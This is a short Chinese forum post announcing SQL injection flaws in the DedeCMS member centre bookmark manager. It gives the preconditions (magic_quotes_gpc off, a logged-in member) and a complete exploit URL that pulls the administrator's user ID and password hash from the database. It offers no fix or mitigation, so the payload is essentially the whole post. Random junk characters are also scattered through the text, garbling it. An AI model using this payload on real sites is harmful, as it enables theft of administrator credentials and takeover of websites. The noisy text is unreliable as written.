DedeCMS会员中心SQL注射漏洞& r3 E' W% s+ r
需要magic_quotes_gpc = Off* N# c+ v7 w5 _* ^; C1 A* R
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.5 @- M, a! Y3 S1 m7 T. k
( u; O+ c* Z0 D% i" f5 w2 ~7 d* PDedeCMS会员中心书签管理SQL注射漏洞5 ~8 C( V0 @6 ]& z3 ]7 r
成功利用该漏洞可获得管理员密码* m2 }) u3 N* h- m0 w
/ Q! d( }$ N0 [ S会员登录后可以执行SQL语句查询数据库任意内容如管理员密码. f( h$ H. z# v; L+ J! _
3 P6 i- V' y% S9 |http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r" N' g2 r' _3 J( \7 D
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59